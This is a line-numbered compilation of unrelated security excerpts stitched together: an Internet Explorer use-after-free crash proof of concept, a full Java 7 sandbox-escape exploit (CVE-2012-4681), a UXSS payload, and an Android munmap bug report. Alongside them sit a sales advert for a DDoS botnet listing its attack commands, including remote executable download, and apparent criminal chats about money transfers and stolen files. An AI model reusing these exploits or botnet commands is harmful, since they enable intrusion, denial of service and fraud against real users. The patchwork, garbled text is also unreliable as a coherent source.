1feac6c4 6d3b23dc 00000000 4542dbd0 50d00bb0 MSHTML!CMarkup::InvokeMarkupTearDownCallbacks+0xc0
1feac6d8 6d3b22c9 00000001 00000001 341a8bb0 MSHTML!CMarkup::TearDownMarkupHelper+0xe4
1feac700 6d3adf1f 00000001 00000001 1feac7d0 MSHTML!CMarkup::TearDownMarkup+0x58
1feac7b0 6dae9665 341a8bb0 00000000 00000000 MSHTML!COmWindowProxy::SwitchMarkup+0x4eb
1feac894 6dae97e3 00005004 ffffffff 00000000 MSHTML!COmWindowProxy::ExecRefresh+0xa1c
1feac8a8 6d0d763b 457f1f68 00005004 00000001 MSHTML!COmWindowProxy::ExecRefreshCallback+0x23
1feac8f0 6d0cd4e2 91c55b56 00000000 6d0cc800 MSHTML!GlobalWndOnMethodCall+0x17b
1feac944 76b862fa 001401c6 00008002 00000000 MSHTML!GlobalWndProc+0x103
1feac970 76b86d3a 6d0cc800 001401c6 00008002 user32!InternalCallWinProc+0x23
1feac9e8 76b877d3 00000000 6d0cc800 001401c6 user32!UserCallWinProcCheckWow+0x109
1feaca4c 76b8789a 6d0cc800 00000000 1feafc28 user32!DispatchMessageWorker+0x3cb
1feaca5c 6e5fa8ac 1feaca9c 62382e48 2efb2fe0 user32!DispatchMessageW+0xf
1feafc28 6e620e88 1feafcf4 6e620b00 5cba2ff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
1feafce8 74e4ad3c 62382e48 1feafd0c 6e614b00 IEFRAME!LCIETab_ThreadProc+0x3e7
1feafd00 6e593a31 5cba2ff0 00000000 6e5939a0 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c
1feafd38 6fae9608 4b3b6fe8 705e0368 00000000 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94

############################################################################################
*/

var doc;
var trg, trg_parent; 
function testcase()
{
var e1_frame = document.getElementById("e1"); 
doc = document; 

e = e1_frame.contentWindow.document.createElement("hr"); 
rf = doc.body.appendChild(e); 

e = e1_frame.contentWindow.document.createElement("audio"); 
rf = doc.body.appendChild(e); 

dom = doc.getElementsByTagName("*");
document.getElementById("e1").removeNode(true); 
trg = dom[14]; 
trg_parent = doc.body; 

trg.addEventListener('DOMNodeRemoved',
new Function('',
//'try{trg.removeEventListener("DOMNodeRemoved",this,false);}catch(e){}'+
'try{trg.appendChild(document.createElement("feOffset")).removeNode(false).ATTRIBUTE_NODE = "false";}catch(e){}'+
'try{trg_parent = trg.cloneNode(true);}catch(e){}'//+
// 'try{doc = document.implementation.createDocument("about:blank","","text/html");}catch(e){}'
),
false);
trg_parent.innerHTML = trg.innerHTML; 
//CollectGarbage();
//trg.innerHTML = "<h1></h1>"
setTimeout('location.reload();',700);
}
</script>
<title>Use After Free</title>
</head>
<body onload='testcase();'>
<iframe></iframe><iframe src='about:blank' id='e1'></iframe>
</body>
</html>
</html>

3008
3009
3010
3011 0day allows remote attackers to bypass API restrictions on
3012vulnerable installations of Adobe Reader with user interaction
3013victim must visit malicious page
3014or open a malicious file with is coded inside with shell codes
3015
30160day exists in AFParseDate
3017by creating specially crafted PDF with specific javascript instructions,
3018it can bypass javascript API restrictions.
3019so attackers can exploit it this way and execute arbitray code
3020
3021Â
3022Notes:
3023Â
3024The code assumes you attached a DLL named exploit.txt to the PDF document
3025to get around attachment security restrictions.
3026Â
3027Acrobat will execute updaternotifications.dll if it's in the same directory
3028as the Acrobat executable or the same directory as the document being
3029opened.
3030Â
3031Credit for discovery and the initial POC that illustrates code being
3032executed in the privileged context (launching a URL) goes to the Zero Day
3033Initiative.
3034
3035
3036Android: Inter-process munmap in android.util.MemoryIntArray
3037Starred by 1 user Project Member Reported by laginimaineb@google.com, Nov 21 Back to list
3038Status: Fixed
3039Owner: laginimaineb@google.com
3040Closed: Today
3041Cc: nnk@google.comkeescook@google.comproject-...@google.com
3042Product-Android
3043Severity-HIgh
3044Deadline-90
3045Vendor-Google
3046CCProjectZeroMembers
3047Finder-laginimaineb
3048Reported-2016-Nov-21
3049CVE-2017-0411
3050
3051
3052
3053Sign in to add a comment The MemoryIntArray class allows processes to share an in-memory array of integers by transferring an ashmem file descriptor. As the class implements the Parcelable interface, it can be passed within a Parcel or a Bundle and transferred via binder to remote processes.
3054
3055The implementation of MemoryIntArray keeps track of the "owner" of each instance by recording the pid of the creating process within the constructor and serializing it to the Parcel whenever the instance is marshalled.
3056
3057Moreover, each MemoryIntArray instance keeps an additional field, mMemoryAddr, denoting the address at which the array is mapped in memory. This field is also written to a Parcel whenever the instance is marshalled (therefore transferring instances of MemoryIntArray between processes automatically reveals information about the address-space of the sharing process, constituting an information-leak).
3058
3059When MemoryIntArray instances are deserialized, they perform a check to see whether or not the current process is the "owner" process of the deserialized instance. If so, the transferred memory address in the parcel is used as the memory address of the shared buffer (as the address space in which the array was created is the same as the current address space).
3060
3061Since all of the fields above are simply written to a Parcel, they can be easily spoofed by an attacker to contain any value. Specifically, this means an attacker may and set the mPid field to the pid of a remote process to which the MemoryIntArray is being sent, and may also set the mMemoryAddr field to point to any wanted memory address. Placing such an instance within a Bundle means that any function the unparcels the Bundle will deserialize the embedded instance, creating a new fully controlled instance in the remote process.
3062
3063Here is a short snippet of the constructor which creates new instances from a given Parcel:
3064
3065private MemoryIntArray(Parcel parcel) throws IOException {
3066 mOwnerPid = parcel.readInt();
3067 mClientWritable = (parcel.readInt() == 1);
3068 mFd = parcel.readParcelable(null);
3069 if (mFd == null) {
3070 throw new IOException("No backing file descriptor");
3071 }
3072 final long memoryAddress = parcel.readLong();
3073 if (isOwner()) { //mOwnerPid == Process.myPid()
3074 mMemoryAddr = memoryAddress;
3075 } else {
3076 mMemoryAddr = nativeOpen(mFd.getFd(), false, mClientWritable);
3077 }
3078}
3079
3080Lastly, once the MemoryIntArray instance is garbage collected, its finalizer is called in order to unmap the shared buffer:
3081
3082static void android_util_MemoryIntArray_close(JNIEnv* env, jobject clazz, jint fd,
3083 jlong ashmemAddr, jboolean owner)
3084{
3085 if (fd < 0) {
3086 jniThrowException(env, "java/io/IOException", "bad file descriptor");
3087 return;
3088 }
3089 int ashmemSize = ashmem_get_size_region(fd);
3090 if (ashmemSize <= 0) {
3091 jniThrowException(env, "java/io/IOException", "bad ashmem size");
3092 return;
3093 }
3094 int unmapResult = munmap(reinterpret_cast<void *>(ashmemAddr), ashmemSize);
3095 if (unmapResult < 0) {
3096 jniThrowException(env, "java/io/IOException", "munmap failed");
3097 return;
3098 }
3099 ...
3100}
3101
3102Putting this together, an attacker may serialize a MemoryIntArray instance with a controlled memory address and ashmem file descriptor in order to cause any remote process which deserializes it to call munmap with a controlled memory address and size. This can then be leveraged by an attacker to replace key memory regions in the remote process with attack-controlled data, achieving code execution.
3103
3104I've attached a small PoC which uses this bug in order to unmap libc.so from the address-space of system_server.
3105 This bug is subject to a 90 day disclosure deadline. If 90 days elapse
3106without a broadly available patch, then the bug report will automatically
3107become visible to the public.
3108
3109
3110
3111Attaching another version of the PoC, adjusted for Android 7.1 (since MemoryIntArray's fields have slightly changed). This version also finds the specific PID of system_server (via /proc/locks) to avoid flooding the process with too many file descriptors.
3112
3113Note that the PoC needs to be executed several times in order to trigger the vulnerability, since the MemoryIntArray instances are sometimes not finalized immediately (I'm unsure why - this leaks file descriptors in system_server).
3114
3115Here is a sample crash from a successful execution of the PoC:
3116
311711-22 11:51:58.574 28893 28893 F DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
311811-22 11:51:58.575 28893 28893 F DEBUG : Build fingerprint: 'Android/sdk_google_phone_x86_64/generic_x86_64:7.1.1/NPF10D/3354678:userdebug/test-keys'
311911-22 11:51:58.575 28893 28893 F DEBUG : Revision: '0'
312011-22 11:51:58.575 28893 28893 F DEBUG : ABI: 'x86_64'
312111-22 11:51:58.575 28893 28893 F DEBUG : pid: 26559, tid: 26574, name: Binder:26559_2 >>> system_server <<<
312211-22 11:51:58.575 28893 28893 F DEBUG : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x7ffef7482000
312311-22 11:51:58.575 28893 28893 F DEBUG : rax 0000000000000000 rbx 0000000013526e20 rcx 000000006f45a0b0 rdx 00000000000001d0
312411-22 11:51:58.575 28893 28893 F DEBUG : rsi 00007ffef7482000 rdi 0000000013526e2c
312511-22 11:51:58.575 28893 28893 F DEBUG : r8 00007ffef7482000 r9 00000000000001d0 r10 00000000fffffff0 r11 00007ffef42ed8b8
312611-22 11:51:58.576 28893 28893 F DEBUG : r12 00000000000001d0 r13 00007ffedf71470c r14 00007ffef7482000 r15 0000000000000000
312711-22 11:51:58.576 28893 28893 F DEBUG : cs 0000000000000033 ss 000000000000002b
312811-22 11:51:58.576 28893 28893 F DEBUG : rip 00007ffef423ed31 rbp 00007ffeea5b3dc0 rsp 00007ffedf7144d0 eflags 0000000000000283
312911-22 11:51:58.577 28893 28893 F DEBUG :
313011-22 11:51:58.577 28893 28893 F DEBUG : backtrace:
313111-22 11:51:58.577 28893 28893 F DEBUG : #00 pc 000000000001cd31 /system/lib64/libc.so (memcpy+33)
313211-22 11:51:58.577 28893 28893 F DEBUG : #01 pc 0000000000925e1f /dev/ashmem/dalvik-main space (deleted) (offset 0x1000)
3133
3134
3135
3136
3137Recently a Universal Cross-Site Scripting(UXSS) vulnerability (CVE-2015-0072) was disclosed on the Full Disclosure mailing list. This unpatched 0day vulnerability discovered by David Leo results in a full bypass of the Same-Origin Policy(SOP) on the latest version of Internet Explorer. This article will briefly explain the technical details behind the vulnerability.
3138The Attack
3139
3140The original Proof-of-Concept(PoC)
3141 can be boiled down into the following simplified one:
3142
3143<iframe src="redirect.php"></iframe>
3144<iframe src="https://www.google.com/images/srpr/logo11w.png"></iframe>
3145<script>
3146 top[0].eval('_=top[1];alert();_.location="javascript:alert(document.domain)"');
3147</script>
3148
3149The simplified PoC requires an iframe with a HTTP redirect to a resource on the target domain,
3150and another iframe which also loads a resource on the target domain.
3151What is worth noting is that the two resources do not necessarily need to be the same,
3152nor their Content-Type matter. In summary:
3153
31541. Browser renders the first frame and issues a request to redirect.php.
31552. Browser renders the second frame and issues a request to target resource.
31563. Browser executes the script which invokes eval on the WindowProxy object of the first frame and perform the following steps:
3157 1. Assign the WindowProxy object of the second frame to a variable.
3158 2. Pop-up an alert dialog box.
3159 3. Wait until the dialog box is closed by the user.
3160 4. Change the location via the variable assigned of the second frame and inject payloads.
31614. The injected payload is executed in the second frame on the target's origin.
3162
3163
3164
3165 bugs in Adobe Reader got fixed:
31661) out-of-bounds read decoding DCT.
31672) out-of-bounds write decoding DCT.
3168
3169
3170
3171Madness PRO DDoS
3172
3173- Written in c + +, easily crypt is lightweight (compressed sample <15KB)
3174- Full compatibility with all windows family (x86 and x64)
3175- Bot has 7 types of attacks
3176- Extremely stable system. Load on CPU and ram is very powerful.
3177- does not attract attention to UAC Windows Firewall
3178- can install port, referal and cookies individually for each attack
3179- Supports up to 10 targets simultaneously
3180- has a very low load on the cpu with the new, complex system parsing Teams (all analogs parsing passes within a function in multiple threads
3181- it's extra work load on the processor. New bot enters all data in the array before the attack and come ready function parameters: address, port, referral, etc.)
3182- has enormous power output of more than 1500 http (and more 30,000 udp) requests per minute due to direct interaction with network drivers, even on Windows Desktop! (Only when using winsock) is about 10 times more than some analogues and several more top (on this indicator) competitors.
3183- in the control panel are: the number of requests per minute, right in the system, the version of the system. - Supports bypassing Cloudflare protection (!) and many other, more simple.
3184- support and slow get slow post! mode
3185- indicated in the packet header off the cache (cache-control: no-cache), which increases the load on the server.
3186- Bot protection of panel.
3187
3188
3189Attack modes and commands:
3190As the system is a professional syntax with commands, this seems complicated, but only at first glance =)
3191• dd1 basic operation by http protocol method get, using sokkety. support *** cookies and $$$ ref and allows up to 10 targets simultaneously (separated by ";"). the fastest search volume attack. Example: DD1 = http://ya.rucookie***$$$referal;http://mail.rucookies2***$$$ referal2
3192• dd2 the same treatment as dd1, only the method of post. added optional parameter @@@ post_data. also supports up to 10 goals. Example: dd2=http://forum.ru/index.php***cookies $$$referal@@@login=yyy&password=hhh, this team posted a username and password yyy hhh a script
3193
3194• dd3 attack http get method using the system library wininet.dll. good old attack used in many delphi bots. slow due to the limitations of desktop windows. not support the referral and cookies, supports up to 10 targets. Example: dd3=http://host.com/script.php
3195• dd4 attack http post method using the system library wininet. the same as dd3, only post. Example:
3196DD4=@@@ http://host.com/script.php@@@=login&password=yyyhhh
3197• dd5 icmp attack (pings). supports up to 10 targets. Example dd5=198.168.0.1;199.0.0.1
3198• dd6 udp attack. supports up to 10 targets. mandatory parameters: port and text. Example: dd6=192.168.0.2:27015@@@flud_text
3199• dd7 attack http get method using the system library urmon.dll average speed attack, supports up to 10 targets and does not support cookies and referal
3200• cfa command bypass the security cloudflare (!). used only during dd7. This is simple - the bot executes java script gets the desired cookie and cloudflare considers requests made dd7 authorized. Example: dd7 = http://site.ru/index.php, then (after fifteen minutes) cfa=http://site.ru/index.php
3201• cmd command is executed on the command interpreter cmd.exe on the local machine. does not stop the execution of other commands. Example: cmd = net user goodwin / add
3202• exe command to load and run the exe file. does not stop the execution of other commands. file will be saved under the same name, under which he was on the Internet. made three attempts to download a file. Example: exe=http://site.com/filename.exe
3203
3204Prices:
3205
3206- Full PRO license 5BTC (all updates Rebuild and modules are free)
3207
3208Payment BTC accepted
3209
3210Warranty:
3211Willing to work with the buyer to resolve any issues that may be encountered
3212
3213Contacts
3214
3215Email: mid13@protonmail.com
3216Jabber: mad13@dukgo.com
3217
3218
3219
3220639949969
3221
3222resolving Kernel Symbols in a Post-ASLR macOS World
3223There are some 21,000 symbols in the macOS kernel, but all but around 3,500 are opaque even to kernel developers. The reasoning behind this was likely twofold: first, Apple is continually making changes and improvements in the kernel, and they probably don’t want kernel developers mucking around with unstable portions of the code. Secondly, kernel dev used to be the wild wild west, especially before you needed a special code signing cert to load a kext, and there were a lot of bad devs who wrote awful code making macOS completely unstable. Customers running such software probably blamed Apple for it, instead of the developer. Apple now has tighter control over who can write kernel code, but it doesn’t mean developers have gotten any better at it. Looking at some commercial products out there, there’s unsurprisingly still terrible code to do things in the kernel that should never be done.
3224So most of the kernel is opaque to kernel developers for good reason, and this has reduced the amount of rope they have to hang themselves with. For some doing really advanced work though (especially in security), the kernel can sometimes feel like a Fisher Price steering wheel because of this, and so many have found ways around privatized functions by resolving these symbols and using them anyway. After all, if you’re going to combat root kits, you have to act like a root kit in many ways, and if you’re going to combat ransomware, you have to dig your claws into many of the routines that ransomware would use – some of which are privatized.
3225Today, there are many awful implementations of both malware and anti-malware code out there that resolve these private kernel symbols. Many of them do idiotic things like open and read the kernel from a file, scan memory looking for magic headers, and other very non-portable techniques that risk destabilizing macOS even more. So I thought I’d take a look at one of the good examples that particularly stood out to me. Some years back, Nemo and Snare wrote some good in-memory symbol resolving code that walked the LC_SYMTAB without having to read the kernel from disk, scan memory, or do any other disgusting things, and did it in a portable way that worked on whatever new versions of macOS came out.Â
3226
3227The __LINKEDIT segment and LC_SYMTAB weren’t loaded into kernel memory util around Snow Leopard, and so prior to that a number of root kits had no choice but to read the symbol table off disk by opening up /mach_kernel, which of course has also been moved around. Today’s versions of macOS make it much easier for a developer to skirt around the privatized kernel symbols, and this is a positive thing, because developers don’t have to be so dangerous with their resolving code.
3228Nemo and Snare’s code has gotten a bit old and stale, so I thought I’d freshen it up a bit under the hood. Two things in particular needed some work to get the engine to turn over. There were some pointer offsets in LC_SYMTAB that weren’t being used right which broke on any recent version of macOS, and it also didn’t handle kernel ASLR, which made it unusable. I fixed the symbol table pointers so that we’re reading the right parts of LC_SYMTAB now, and I’ve also come up with a novel way to deduce the kernel base address by using some maths and a command that Apple has exposed to the public KPI to unslide memory, which subtracts vm_kernel_slide out for you.
3229The functon vm_kernel_unslide_or_perm_external was originally added to expose an address to userspace from the kernel or heap. Exposing kernel address space to userspace seems like a really awful idea, but the function can be used for just that; if you feed it the usual kernel load address (0xffffff8000200000), it will subtract vm_kernel_slide for you, which isn’t exposed to the KPI, and give you the base kernel address in memory – really quite simple and elegant. No ugly hacks required. You don’t have to back-read memory to find 0xfeedfacr or anything else. Apple’s code is pretty intentional, so this isn’t a hack either; they’ve provided you with a way to unslide kernel ASLR from within the kernel, which is a lot safer than some of the ways devs were doing it before.
3230In addition to these fixes to the code, I’ve also added a simple usage example to demonstrate how to call a function once you’ve actually found the symbol. There are a few different conventions that are possible, I used a less old school and more implicit technique to invoke proc_task to obtain the task for launchd in this example.
3231Click the link below to read the full source of the new and improved version of Snare’s kernel resolver. Special thanks to Snare for making his original code available.
3232https://www.zdziarski.com/KernelResolver.c
3233
3234
3235
3236CVE-2012-4681 update
3237
3238The famous Java 0day vulnerability which used by chinese attackers has been patched by oracle.
3239
3240The actual attack used two vulnerabilities in order to jump outside of the java sandboxing mechanism to bypass some security restrictions.
3241
3242Now, oracle has fortified JRE/JDK vulnerabilities by releasing official patches addressing at least 4 critical vulnerabilities in java code.
3243
3244The updates addressed CVE-2012-4681, CVE-2012-1682, CVE-2012-3136, and CVE-2012-0547vulnerabilities, also notable that these critical updates are only applicable to java running on desktop browsers and not in java standalone applications running on servers. (according to oracle's official blog post)
3245
3246Most of the vulnerabilities allow the attacker to execute arbitrary code in order to install malicious codes like installing malware and running exploit to gain access to victim's machine.
3247
3248Also, taking a glance at the 0day exploit released by the java expert Michael Schierl is not a bad idea
3249
3250
3251import java.beans.*;
3252import java.io.File;
3253import java.lang.reflect.Field;
3254import java.net.URL;
3255import java.security.*;
3256import java.security.cert.Certificate;
3257import com.sun.beans.finder.ClassFinder;
3258public class Java7ZeroDay {
3259 public static void disableSecurity() throws Throwable {
3260 // get access to sun.awt.SunToolkit, which is in a restricted package,
3261 // so this should NOT work...
3262 Class<?> sun_awt_SunToolkit = ClassFinder.findClass("sun.awt.SunToolkit");
3263 // the rest is just a short way to exploit having access to that class.
3264 // we have to call everything "indirectly" since the verifier would
3265 // refuse to load the class if it directly tried to call that methods.
3266 // call SunToolkit.getField to get an accessor to private "acc" field of
3267 // Statement.class. (That method is new in Java 7, but there are plenty
3268 // of other (more convoluted) ways in earlier versions to elevate
3269 // permissions if you have access to restricted packages).
3270 Expression expr = new Expression(sun_awt_SunToolkit, "getField", new Object[] { Statement.class, "acc" });
3271 expr.execute();
3272 Field acc_Field = ((Field) expr.getValue());
3273 // create an access control context with all permissions
3274 Permissions allPerms = new Permissions();
3275 allPerms.add(new AllPermission());
3276 AccessControlContext allPermAcc = new AccessControlContext(new ProtectionDomain[] {
3277 new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), allPerms)
3278 });
3279 // create a statement that disabled the security manager, to run in our
3280 // own untrusted access control context
3281 Statement disableSecurityManager = new Statement(java.lang.System.class, "setSecurityManager", new Object[1]);
3282 // use our private acc field accessor to change the access control
3283 // context of the statement above to the access control context with all
3284 // permissions
3285 acc_Field.set(disableSecurityManager, allPermAcc);
3286 // and call it (now that it has all permissions)
3287 disableSecurityManager.execute();
3288 }
3289 // test method, call this like this
3290 // java -Djava.security.manager Java7ZeroDay
3291 public static void main(String[] args) throws Throwable {
3292 try {
3293 new File("C:/").list();
3294 System.out.println("No Security Manager present");
3295 } catch (SecurityException ex) {
3296 disableSecurity();
3297 System.out.println("Security Manager disabled. Proof:");
3298 for (File file : new File("C:/").listFiles())
3299 System.out.println("\t" + file);
3300 }
3301 }
3302}
3303Also from the updated post by the security firm immunity, the patch works fine against the java 7 0day exploit provided by immunity canvas exploit kit and prevents the exploit to trigger the vulnerability and run the desired code
3304
3305
3306java.security.AccessControlException: access denied
3307("java.lang.RuntimePermission" "accessClassInPackage.sun.awt")
3308Â at
3309java.security.AccessControlContext.checkPermission(AccessControlContext.java:366)
3310Â at
3311java.security.AccessController.checkPermission(AccessController.java:555)
3312Â at java.lang.SecurityManager.checkPermission(SecurityManager.java:549)
3313Â at
3314java.lang.SecurityManager.checkPackageAccess(SecurityManager.java:1529)
3315Â at sun.applet.AppletSecurity.checkPackageAccess(AppletSecurity.java:283)
3316Â at sun.reflect.misc.ReflectUtil.checkPackageAccess(ReflectUtil.java:134)
3317Â at com.sun.beans.finder.ClassFinder.findClass(ClassFinder.java:100)
3318Â at com.sun.beans.finder.ClassFinder.resolveClass(ClassFinder.java:170)
3319Â at java.beans.Statement.invokeInternal(Statement.java:213)
3320Â at java.beans.Statement.access$000(Statement.java:58)
3321Â at java.beans.Statement$2.run(Statement.java:185)
3322Â at java.security.AccessController.doPrivileged(Native Method)
3323Â at java.beans.Statement.invoke(Statement.java:182)
3324Â at java.beans.Expression.execute(Expression.java:121)
3325Â at Gondvv.GetClass(Gondvv.java:38)
3326Â at Gondvv.SetField(Gondvv.java:46)
3327Â at Gondvv.disableSecurity(Gondvv.java:30)
3328Â at Gondvv.init(Gondvv.java:53)
3329Â at sun.applet.AppletPanel.run(AppletPanel.java:434)
3330Â at java.lang.Thread.run(Thread.java:722)
3331
3332
3333In case of vulnerable targets to the famous java 0day vulnerability we can mention that all browser configurations on Windows systems, and against Safari on OS X 10.7.4 and Mozilla Firefox on Ubuntu Linux 10.04 are vulnerable.
3334
3335So regarding to cross-platform property of the latest java 0day, It's a critical alert to all users (whether individuals or organizations) to apply the security patches offered by the vendor here.
3336
3337
3338Further changes regarding java vulnerabilities will be updated on this post accordingly.
3339
3340
3341
3342
3343About the processor_set_tasks() access to kernel memory vulnerability
3344May 5, 2014Security
3345At BlackHat Asia 2014, Ming-chieh Pan and Sung-ting Tsai presented about Mac OS X Rootkits (paper and slides). They describe some very cool techniques to access kernel memory in different ways than the usual ones. The slides and paper aren’t very descriptive about all the techniques so this weekend I decided to give it a try and replicate the described vulnerability to access kernel memory.
3346The access to kernel task (process 0) was possible before Leopard (or was it fixed in Snow Leopard? too lazy to check it now!), by using the function task_for_pid(0). This would retrieve the task port for the kernel and then we could use the mach_vm_read/write functions to fool around with kernel memory. It was pretty cool but a giant hole, even if it required root access to be used. The task_for_pid() function now has the following code to deny access to the kernel task (from 10.9.0 XNU source code):

3347/*
3348 * Routine: task_for_pid
3349 * Purpose:
3350 * Get the task port for another "process", named by its
3351 * process ID on the same host as "target_task".
3352 *
3353 * Only permitted to privileged processes, or processes
3354 * with the same user ID.
3355 *
3356 * Note: if pid == 0, an error is return no matter who is calling.
3357 *
3358 * XXX This should be a BSD system call, not a Mach trap!!!
3359 */
3360kern_return_t
3361task_for_pid(
3362 struct task_for_pid_args *args)
3363{
3364...
3365 /* Always check if pid == 0 */
3366 if (pid == 0) {
3367 (void ) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t));
3368 AUDIT_MACH_SYSCALL_EXIT(KERN_FAILURE);
3369 return(KERN_FAILURE);
3370 }
3371...
3372}
3373So root or not, we can’t use this trick anymore to get the kernel task port. But Apple was so kind to leave a similar hole in other functions as the mentioned presentation shows. The function processor_set_tasks() lists all the tasks in the processor set. What is a processor set? Mac OS X and iOS Internals book describes it as “A processor set is a logically coupled group of processors and allows Mach to efficiently scale to SMP architectures by using the set as a container for related processorsâ€. Essentially a XNU abstraction to scale to multiprocessors/multicores architectures. The interesting bit out of this function is that it returns the task port for all the tasks in the processor set, which in practice should mean all processes running in the system. This includes the kernel task due to XNU design, where the kernel is just another task in the system.
3374The vulnerability is very easy to use! We just set all the necessary ports to use processor_set_tasks, calls this function, and get the kernel task port in the element zero of the returned task_array_t of processor_set_tasks. After having the task port we can use the mach_vm_read and mach_vm_write functions to read and write from kernel memory, like it’s done for userland processes. The first argument for those functions is the task port, so as long we have a valid port we can do whatever we want with the kernel memory or any other process in the system (technically all the processes in the task list but there’s a one to one mapping between tasks and BSD processes in OS X).
3375Also a very fun detail is that this same vulnerability was *perfectly* described in Mac OS X and iOS Internals book for a long time on page 387. A screenshot of that page follows:
3376
3377I totally missed the clue when I read it although my silly brain still remembered I read something about the processor sets in the book. The other funny detail about this is at the bottom of that page, where it says the vulnerability was fixed in iOS but left all this time in OS X (still unfixed in latest Mavericks update).
3378If you want to see it working you can check the checkidt util in Github repo. This is an updated version of an old port I did from a Phrack article three years ago. It tries to use this vulnerability to read from kernel memory before trying to use the /dev/kmem device (that needs to be manually configured in OS X). It is a very useful vulnerability to this kind of tools :-).
3379What’s the catch about all this? It still needs root access to work, which is not perfect from a rootkit point of view but also not a big obstacle (how many installers ask for admin privileges? too many!). Task_for_pid(0) was fixed and it also required root privileges to work.
3380This is/was a nice bug, let it rest in peace and be useful while it lasts ;-).
3381Have fun,
fG!
3382
3383
3384
3385
3386The exploit shown in this video is one of the most sophisticated codes we have seen and created so far
3387as it bypasses all security features including :
3388
3389
3390- ASLR [Address Space Layout Randomization]
3391- DEP [Data Execution Prevention]
3392- Sandbox,
3393-
3394 it is silent [no crash after executing the payload]
3395 it relies on undisclosed (0day) vulnerabilities discovered by VUPEN
3396and it works on all Windows systems (32-bit and x64)."
3397
3398In the video, someone using Chrome v11.0.696.65 on Windows 7 Service Pack 1 (x64)
3399 is tricked into visiting a malicious Web page hosting the exploit.
3400Once the machine is compromised, the exploit code downloads a Calculator program from a remote location and launches it outside the sandbox at "medium" integrity level,
3401
3402
3403"While Chrome has one of the most secure sandboxes and has always survived the Pwn2Own
3404during the last three years, we have now uncovered a reliable way to execute arbitrary code on any installation of Chrome despite its sandbox, ASLR and DEP,"
3405
3406=================================================================================== KeenTeam exploiting Adobe Flash.
3407used a heap overflow remote code execution vulnerability in Flash,
3408 then leveraged a local privilege escalation in the Windows kernel through TrueType fonts, bypassing all defensive measures.
3409They were awarded $60,000 USD for the Flash bug
3410 bonus of $25,000 for the SYSTEM escalation.
3411Â
3412Nicolas followed with his own exploit of Flash.
3413 He used a use-after-free (UAF) remote code execution vulnerability and sandbox escape directory traversal vulnerability in the Flash broker.
3414
3415Â
3416Nicolas continued his exploitation domination
3417 by taking down Adobe Reader through a stack buffer overflow
3418 once for an info leak and again for remote code execution.
3419He then leveraged an integer overflow to exploit the broker,
3420writing the final part of the exploit chain on the flight to the conference
3421Â
3422KeenTeam continued rollin’ in the heap by taking down Adobe Reader with an integer overflow and achieved pool corruption through a different TTF bug. This got them SYSTEM access
3423Â
3424- Mozilla Firefox exploited via a cross-origin vulnerability followed by privilege escalation within the browser – all within .542 seconds. This allowed to execute a logical flaw to escalate to SYSTEM in Windows
3425Â
3426- 64-bit Microsoft Internet Explorer 11 exploit with an uninitialized memory vulnerability netting them medium-integrity code execution
3427Â
3428- Apple Safari exploited the browser through a use-after-free (UAF) bug then leveraged an out-of-bounds bug in the kernel to escalate to root.
3429
3430- Microsoft Edge browser exploiting an uninitialized stack variable in the browser then a directory traversal bug to escalate to SYSTEM.
3431
3432- Adobe Flash while attempting to elevate to SYSTEM.
3433 two failed attempts show the difficulty of creating an exploit chain able to compromise modern software.
3434
3435- Microsoft Edge >> exploit chain >> used an out-of-bounds vulnerability in the browser combined with a buffer overflow in the Windows kernel to get to SYSTEM,
3436
3437
3438lokihardt started out by tackling Apple Safari.
3439The first was a use-after-free (UAF) in the browser while the subsequent ones – including a heap overflow – escalated his privileges to root
3440
3441- Adobe Flash able to use a type confusion bug in Flash and a Windows kernel bug to escalate from user mode to SYSTEM.
3442
3443
3444- Apple safari root-level escalation along with it. True to their word, the group used a UAF in the browser and escalated using a UAF in a privileged process
3445
3446
3447- Adobe Flash. They leveraged an out-of-bounds bug in Flash followed by an infoleak in the Windows kernel that allowed a UAF to achieve SYSTEM-level code execution.
3448
3449- including a SYSTEM-level elevation in their Adobe Flash exploit attempt.
3450
3451- managed to exploit Google Chrome on Windows 7 and also used a kernel bug to bypass the sandbox.
3452
3453- by visiting a malicious webpage, it was possible to exploit a vulnerability which allowed us to gain code execution in the context of the sandboxed renderer process.
3454- used a kernel vulnerability in the underlying operating system in order to gain elevated privileges and to execute arbitrary commands outside of the sandbox with system privileges
3455
3456
3457
3458- Java cracked up to three times by three different hackers.Â
3459- Writing exploits in general is getting much harder.
3460 - Java is really easy because there's no sandbox."
3461
3462Â - Chrome was the hardest target because of its sandbox
3463
3464
3465I called mg yesterday, they said me that receiving limit in Morocco is $10000. That means that you can pick up $10000 but we can send $5000, so max is $5000, this is what they told me. I think you should also ask your local MoneyGram agent to confirm.
3466
3467Max is $5000 per transfer
3468
3469We can send $5000 per transfer, may be $2999 is your local limit ?
3470
3471
3472We can make wu or mg, we can send $5000 per transfer and can make several transfers per day
3473
3474Mg says limit $5000 for sending from Russia and $10 000 receiving limit in Morocco per transfer so we can send $5000 max and you need to make 3-4 orders
3475
3476So you can make 4 orders $4000 per order or three orders for 5000 usd and 4th order with the remained amount
3477
3478Limit $5000
3479
3480
3481
3482
3483Conversation with _1nf3ct0r_@exploit.im on Fri Jan 6 21:03:02 2017:
3484(21:03:03) Attempting to start a private conversation with _1nf3ct0r_@exploit.im...
3485
3486
3487---
3488
3489
3490(21:52:00) Attempting to start a private conversation with _1nf3ct0r_@exploit.im...
3491(21:52:02) Unverified (http://otr-help.cypherpunks.ca/unverified.php?lang=en) conversation with _1nf3ct0r_@exploit.im/15484058151483736501249055 started.
3492(21:55:00) _1nf3ct0r_@exploit.im: files in Dedik I did not unpack them just did a screen
3493(21:55:13) symlink40: don't unpack just take screenshot ?
3494(21:55:30) _1nf3ct0r_@exploit.im: yes
3495(21:56:05) symlink40: send it
3496(22:01:06) symlink40: why takes so long to screenshot
3497(22:01:28) symlink40: going offline for some work
3498(22:01:32) symlink40: can you let me know when I get back
3499(22:01:47) _1nf3ct0r_@exploit.im: send
3500(22:01:54) symlink40: send what ?
3501(22:02:04) _1nf3ct0r_@exploit.im: screens
3502(22:02:09) symlink40: of what
3503(22:02:39) _1nf3ct0r_@exploit.im: gmail
3504(22:03:05) _1nf3ct0r_@exploit.im: 02:48:50) symlink40@exploit.im: im just asking for a screenshot that shows those zip files
